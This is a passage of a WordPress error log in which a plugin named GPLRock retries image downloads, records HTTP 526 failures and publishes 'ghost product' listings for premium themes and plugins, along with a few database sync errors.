UTC] GPLRock: Image download failed for product image-hover-effects-for-avada-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-hover-effects-for-avada-builder-30769.webp for product image-hover-effects-for-avada-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:46:00 UTC] GPLRock WARNING: Image download failed for product image-hover-effects-for-avada-builder. URL: https://meldwp.com/wp-content/uploads/image-hover-effects-for-avada-builder-30769.webp [04-Apr-2026 23:46:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-hover-effects-for-avada-builder [04-Apr-2026 23:46:00 UTC] GPLRock: Image downloaded successfully for product wordpress-sms-marketing-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-928814c5.webp [04-Apr-2026 23:46:00 UTC] GPLRock: Using pre-downloaded image for product wordpress-sms-marketing-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-928814c5.webp [04-Apr-2026 23:46:00 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-sms-marketing-plugin [04-Apr-2026 23:46:01 UTC] GPLRock: Image download failed for product gotabs-horizontal-vertical-tabs-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:03 UTC] GPLRock: Image download failed for product gotabs-horizontal-vertical-tabs-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gotabs---horizontal--vertical-tabs-for-wpbakery-page-builder-19361.webp for product gotabs-horizontal-vertical-tabs-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:46:05 UTC] GPLRock: Image download failed for product gotabs-horizontal-vertical-tabs-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:07 UTC] GPLRock: Image download failed for product gotabs-horizontal-vertical-tabs-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gotabs---horizontal--vertical-tabs-for-wpbakery-page-builder-19361.webp for product gotabs-horizontal-vertical-tabs-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:46:09 UTC] GPLRock WARNING: Image download failed for product gotabs-horizontal-vertical-tabs-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/gotabs---horizontal--vertical-tabs-for-wpbakery-page-builder-19361.webp [04-Apr-2026 23:46:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gotabs-horizontal-vertical-tabs-for-wpbakery-page-builder [04-Apr-2026 23:46:09 UTC] GPLRock: Image download failed for product vision-interactive-image-map-builder-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:11 UTC] GPLRock: Image download failed for product vision-interactive-image-map-builder-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vision---interactive-image-map-builder-for-wordpress-21641.webp for product vision-interactive-image-map-builder-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:46:14 UTC] GPLRock: Image download failed for product vision-interactive-image-map-builder-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:16 UTC] GPLRock: Image download failed for product vision-interactive-image-map-builder-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:46:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vision---interactive-image-map-builder-for-wordpress-21641.webp for product vision-interactive-image-map-builder-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:46:18 UTC] GPLRock WARNING: Image download failed for product vision-interactive-image-map-builder-for-wordpress. URL: https://meldwp.com/wp-content/uploads/vision---interactive-image-map-builder-for-wordpress-21641.webp [04-Apr-2026 23:46:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vision-interactive-image-map-builder-for-wordpress [04-Apr-2026 23:47:55 UTC] GPLRock: Image downloaded successfully for product facetwp-pods-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10b6d85f.jpg [04-Apr-2026 23:47:55 UTC] GPLRock: Using pre-downloaded image for product facetwp-pods-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10b6d85f.jpg [04-Apr-2026 23:47:55 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-pods-integration [04-Apr-2026 23:47:56 UTC] GPLRock: Image downloaded successfully for product pile-an-uncoventional-wordpress-portfolio-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a29e6345.jpg [04-Apr-2026 23:47:57 UTC] GPLRock: Using pre-downloaded image for product pile-an-uncoventional-wordpress-portfolio-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a29e6345.jpg [04-Apr-2026 23:47:57 UTC] GPLRock: Ghost product published with image - Product ID: pile-an-uncoventional-wordpress-portfolio-theme [04-Apr-2026 23:47:58 UTC] GPLRock: Image downloaded successfully for product green-earth-environmental-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd04b9a7.jpg [04-Apr-2026 23:47:58 UTC] GPLRock: Using pre-downloaded image for product green-earth-environmental-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd04b9a7.jpg [04-Apr-2026 23:47:58 UTC] GPLRock: Ghost product published with image - Product ID: green-earth-environmental-wordpress-theme [04-Apr-2026 23:48:00 UTC] GPLRock: Image downloaded successfully for product helpguru-a-self-service-knowledge-base-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3c2d3a27.jpg [04-Apr-2026 23:48:00 UTC] GPLRock: Using pre-downloaded image for product helpguru-a-self-service-knowledge-base-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3c2d3a27.jpg [04-Apr-2026 23:48:00 UTC] GPLRock: Ghost product published with image - Product ID: helpguru-a-self-service-knowledge-base-wordpress-theme [04-Apr-2026 23:48:02 UTC] GPLRock: Image downloaded successfully for product themify-builder-fittext (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48f1ae5a.jpg [04-Apr-2026 23:48:02 UTC] GPLRock: Using pre-downloaded image for product themify-builder-fittext: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48f1ae5a.jpg [04-Apr-2026 23:48:02 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-fittext [04-Apr-2026 23:48:04 UTC] GPLRock: Image downloaded successfully for product mainwp-wordfence (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14280db3.jpg [04-Apr-2026 23:48:04 UTC] GPLRock: Using pre-downloaded image for product mainwp-wordfence: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14280db3.jpg [04-Apr-2026 23:48:04 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-wordfence [04-Apr-2026 23:48:05 UTC] GPLRock: Image downloaded successfully for product mythemeshop-fashionblog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-070c11ca.jpg [04-Apr-2026 23:48:05 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-fashionblog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-070c11ca.jpg [04-Apr-2026 23:48:05 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-fashionblog-wordpress-theme [04-Apr-2026 23:48:07 UTC] GPLRock: Image downloaded successfully for product css-igniter-specialty-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44ccc343.jpg [04-Apr-2026 23:48:07 UTC] GPLRock: Using pre-downloaded image for product css-igniter-specialty-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44ccc343.jpg [04-Apr-2026 23:48:07 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-specialty-wordpress-theme [04-Apr-2026 23:48:09 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-software-specs (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-173cde8d.jpg [04-Apr-2026 23:48:09 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-software-specs: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-173cde8d.jpg [04-Apr-2026 23:48:09 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-software-specs [04-Apr-2026 23:48:11 UTC] GPLRock: Image downloaded successfully for product mythemeshop-cyprus-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b1a4e18b.jpg [04-Apr-2026 23:48:11 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-cyprus-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b1a4e18b.jpg [04-Apr-2026 23:48:11 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-cyprus-wordpress-theme [04-Apr-2026 23:48:14 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, wp_prime_option_caches [04-Apr-2026 23:48:14 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT autoload FROM wpwf_options WHERE option_name = '_transient_doing_cron' LIMIT 1 made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, update_option [04-Apr-2026 23:48:14 UTC] WordPress database error Commands out of sync; you can't run this command now for query UPDATE `wpwf_options` SET `option_value` = '1775346494.0465219020843505859375' WHERE `option_name` = '_transient_doing_cron' made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, update_option [04-Apr-2026 23:49:45 UTC] GPLRock: Image downloaded successfully for product roethlon-american-football-nfl-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac82b271.jpg [04-Apr-2026 23:49:45 UTC] GPLRock: Using pre-downloaded image for product roethlon-american-football-nfl-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac82b271.jpg [04-Apr-2026 23:49:45 UTC] GPLRock: Ghost product published with image - Product ID: roethlon-american-football-nfl-elementor-template-kit [04-Apr-2026 23:49:47 UTC] GPLRock: Image downloaded successfully for product rockway-music-band-musician-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a749ec1e.webp [04-Apr-2026 23:49:47 UTC] GPLRock: Using pre-downloaded image for product rockway-music-band-musician-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a749ec1e.webp [04-Apr-2026 23:49:47 UTC] GPLRock: Ghost product published with image - Product ID: rockway-music-band-musician-elementor-template-kit [04-Apr-2026 23:49:48 UTC] GPLRock: Image downloaded successfully for product robbie-magie-wedding-event-invitation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-196bd446.jpg [04-Apr-2026 23:49:48 UTC] GPLRock: Using pre-downloaded image for product robbie-magie-wedding-event-invitation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-196bd446.jpg [04-Apr-2026 23:49:48 UTC] GPLRock: Ghost product published with image - Product ID: robbie-magie-wedding-event-invitation-elementor-template-kit [04-Apr-2026 23:49:50 UTC] GPLRock: Image downloaded successfully for product roadpedal-bicycle-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1f01570.webp [04-Apr-2026 23:49:50 UTC] GPLRock: Using pre-downloaded image for product roadpedal-bicycle-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1f01570.webp [04-Apr-2026 23:49:50 UTC] GPLRock: Ghost product published with image - Product ID: roadpedal-bicycle-store-elementor-template-kit [04-Apr-2026 23:49:51 UTC] GPLRock: Image downloaded successfully for product riverflow-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cefc6d24.webp [04-Apr-2026 23:49:51 UTC] GPLRock: Using pre-downloaded image for product riverflow-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cefc6d24.webp [04-Apr-2026 23:49:51 UTC] GPLRock: Ghost product published with image - Product ID: riverflow-creative-portfolio-elementor-template-kit [04-Apr-2026 23:49:53 UTC] GPLRock: Image downloaded successfully for product rhodos-business-portfolio-elementor-blocks-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0389bc69.webp [04-Apr-2026 23:49:53 UTC] GPLRock: Using pre-downloaded image for product rhodos-business-portfolio-elementor-blocks-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0389bc69.webp [04-Apr-2026 23:49:53 UTC] GPLRock: Ghost product published with image - Product ID: rhodos-business-portfolio-elementor-blocks-template-kit [04-Apr-2026 23:49:54 UTC] GPLRock: Image downloaded successfully for product rhent-motorcycle-rental-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b47b6a2a.webp [04-Apr-2026 23:49:54 UTC] GPLRock: Using pre-downloaded image for product rhent-motorcycle-rental-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b47b6a2a.webp [04-Apr-2026 23:49:54 UTC] GPLRock: Ghost product published with image - Product ID: rhent-motorcycle-rental-services-elementor-template-kit [04-Apr-2026 23:49:56 UTC] GPLRock: Image downloaded successfully for product revive-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b126593a.webp [04-Apr-2026 23:49:56 UTC] GPLRock: Using pre-downloaded image for product revive-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b126593a.webp [04-Apr-2026 23:49:56 UTC] GPLRock: Ghost product published with image - Product ID: revive-medical-elementor-template-kit [04-Apr-2026 23:49:57 UTC] GPLRock: Image downloaded successfully for product revirta-virtual-assistant-business-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4636f6f0.webp [04-Apr-2026 23:49:57 UTC] GPLRock: Using pre-downloaded image for product revirta-virtual-assistant-business-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4636f6f0.webp [04-Apr-2026 23:49:57 UTC] GPLRock: Ghost product published with image - Product ID: revirta-virtual-assistant-business-template-kit [04-Apr-2026 23:49:59 UTC] GPLRock: Image downloaded successfully for product reveri-education-online-courses-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b62a9a37.webp [04-Apr-2026 23:49:59 UTC] GPLRock: Using pre-downloaded image for product reveri-education-online-courses-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b62a9a37.webp [04-Apr-2026 23:49:59 UTC] GPLRock: Ghost product published with image - Product ID: reveri-education-online-courses-elementor-template-kit [04-Apr-2026 23:51:33 UTC] GPLRock: Image download failed for product connection-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:35 UTC] GPLRock: Image download failed for product connection-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/connection--creative-agency-wordpress-theme-21169.webp for product connection-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:51:37 UTC] GPLRock: Image download failed for product connection-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:39 UTC] GPLRock: Image download failed for product connection-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/connection--creative-agency-wordpress-theme-21169.webp for product connection-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:51:41 UTC] GPLRock WARNING: Image download failed for product connection-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/connection--creative-agency-wordpress-theme-21169.webp [04-Apr-2026 23:51:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: connection-creative-agency-wordpress-theme [04-Apr-2026 23:51:41 UTC] GPLRock: Image download failed for product bygge-construction-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:43 UTC] GPLRock: Image download failed for product bygge-construction-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bygge---construction-theme-31353.webp for product bygge-construction-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:51:45 UTC] GPLRock: Image download failed for product bygge-construction-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:48 UTC] GPLRock: Image download failed for product bygge-construction-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bygge---construction-theme-31353.webp for product bygge-construction-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:51:50 UTC] GPLRock WARNING: Image download failed for product bygge-construction-theme. URL: https://meldwp.com/wp-content/uploads/bygge---construction-theme-31353.webp [04-Apr-2026 23:51:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bygge-construction-theme [04-Apr-2026 23:51:50 UTC] GPLRock: Image download failed for product kroth-businessconsulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:51:52 UTC] GPLRock: Image download failed for product kroth-businessconsulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:01:43 UTC] GPLRock: Image download failed for product dleh-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:01:45 UTC] GPLRock: Image download failed for product dleh-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:01:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dleh---creative-multi-purpose-wordpress-theme-18337.webp for product dleh-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:01:47 UTC] GPLRock: Image download failed for product dleh-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:01:50 UTC] GPLRock: Image download failed for product dleh-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:01:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dleh---creative-multi-purpose-wordpress-theme-18337.webp for product dleh-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:01:52 UTC] GPLRock WARNING: Image download failed for product dleh-creative-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dleh---creative-multi-purpose-wordpress-theme-18337.webp [05-Apr-2026 00:01:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dleh-creative-multi-purpose-wordpress-theme [05-Apr-2026 00:01:52 UTC] GPLRock: Image download failed for product melina-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:01:54 UTC] GPLRock: Image download failed for product melina-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:01:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/melina---personal-blog--magazine-wordpress-theme-16454.webp for product melina-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:01:56 UTC] GPLRock: Image download failed for product melina-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:01:58 UTC] GPLRock: Image download failed for product melina-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:02:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/melina---personal-blog--magazine-wordpress-theme-16454.webp for product melina-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:02:00 UTC] GPLRock WARNING: Image download failed for product melina-personal-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/melina---personal-blog--magazine-wordpress-theme-16454.webp [05-Apr-2026 00:02:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: melina-personal-blog-magazine-wordpress-theme [05-Apr-2026 00:02:01 UTC] GPLRock: Image download failed for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:02:03 UTC] GPLRock: Image download failed for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:22:09 UTC] GPLRock: Image downloaded successfully for product exponent-modern-multi-purpose-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-550abdbc.jpg [05-Apr-2026 00:22:09 UTC] GPLRock: Using pre-downloaded image for product exponent-modern-multi-purpose-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-550abdbc.jpg [05-Apr-2026 00:22:09 UTC] GPLRock: Ghost product published with image - Product ID: exponent-modern-multi-purpose-business-wordpress-theme [05-Apr-2026 00:22:11 UTC] GPLRock: Image downloaded successfully for product gravityview-gravity-forms-calendar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2af76c57.jpg [05-Apr-2026 00:22:11 UTC] GPLRock: Using pre-downloaded image for product gravityview-gravity-forms-calendar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2af76c57.jpg [05-Apr-2026 00:22:11 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-gravity-forms-calendar [05-Apr-2026 00:22:13 UTC] GPLRock: Image downloaded successfully for product news-magazine-papr-news-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6376c718.jpg [05-Apr-2026 00:22:13 UTC] GPLRock: Using pre-downloaded image for product news-magazine-papr-news-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6376c718.jpg [05-Apr-2026 00:22:13 UTC] GPLRock: Ghost product published with image - Product ID: news-magazine-papr-news-magazine-wordpress-theme [05-Apr-2026 00:22:14 UTC] GPLRock: Image downloaded successfully for product monsterinsights-ecommerce-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2b91d88e.jpg [05-Apr-2026 00:22:14 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-ecommerce-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2b91d88e.jpg [05-Apr-2026 00:22:14 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-ecommerce-addon [05-Apr-2026 00:22:16 UTC] GPLRock: Image downloaded successfully for product wordpress-real-media-library (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5d7bd774.jpg [05-Apr-2026 00:22:16 UTC] GPLRock: Using pre-downloaded image for product wordpress-real-media-library: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5d7bd774.jpg [05-Apr-2026 00:22:16 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-real-media-library [05-Apr-2026 00:22:17 UTC] GPLRock: Image downloaded successfully for product cost-calculator-by-boldthemes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a480514.jpg [05-Apr-2026 00:22:17 UTC] GPLRock: Using pre-downloaded image for product cost-calculator-by-boldthemes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a480514.jpg [05-Apr-2026 00:22:17 UTC] GPLRock: Ghost product published with image - Product ID: cost-calculator-by-boldthemes [05-Apr-2026 00:22:19 UTC] GPLRock: Image downloaded successfully for product pinterest-automatic-pin-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-72059d30.jpg [05-Apr-2026 00:22:19 UTC] GPLRock: Using pre-downloaded image for product pinterest-automatic-pin-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-72059d30.jpg [05-Apr-2026 00:22:19 UTC] GPLRock: Ghost product published with image - Product ID: pinterest-automatic-pin-wordpress-plugin [05-Apr-2026 00:22:20 UTC] GPLRock: Image downloaded successfully for product business-lounge-multi-purpose-consulting-finance-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d9dbe28.jpg [05-Apr-2026 00:22:20 UTC] GPLRock: Using pre-downloaded image for product business-lounge-multi-purpose-consulting-finance-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d9dbe28.jpg [05-Apr-2026 00:22:20 UTC] GPLRock: Ghost product published with image - Product ID: business-lounge-multi-purpose-consulting-finance-theme [05-Apr-2026 00:22:22 UTC] GPLRock: Image downloaded successfully for product ubermenu-wordpress-mega-menu-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5d44b794.jpg [05-Apr-2026 00:22:22 UTC] GPLRock: Using pre-downloaded image for product ubermenu-wordpress-mega-menu-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5d44b794.jpg [05-Apr-2026 00:22:22 UTC] GPLRock: Ghost product published with image - Product ID: ubermenu-wordpress-mega-menu-plugin [05-Apr-2026 00:22:24 UTC] GPLRock: Image downloaded successfully for product jetmenu-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af83b207.jpg [05-Apr-2026 00:22:24 UTC] GPLRock: Using pre-downloaded image for product jetmenu-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af83b207.jpg [05-Apr-2026 00:22:24 UTC] GPLRock: Ghost product published with image - Product ID: jetmenu-for-elementor [05-Apr-2026 00:23:09 UTC] GPLRock: Image download failed for product uruana-multi-store-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:12 UTC] GPLRock: Image download failed for product uruana-multi-store-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/uruana---multi-store-responsive-wordpress-theme-28110.webp for product uruana-multi-store-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:14 UTC] GPLRock: Image download failed for product uruana-multi-store-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:16 UTC] GPLRock: Image download failed for product uruana-multi-store-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/uruana---multi-store-responsive-wordpress-theme-28110.webp for product uruana-multi-store-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 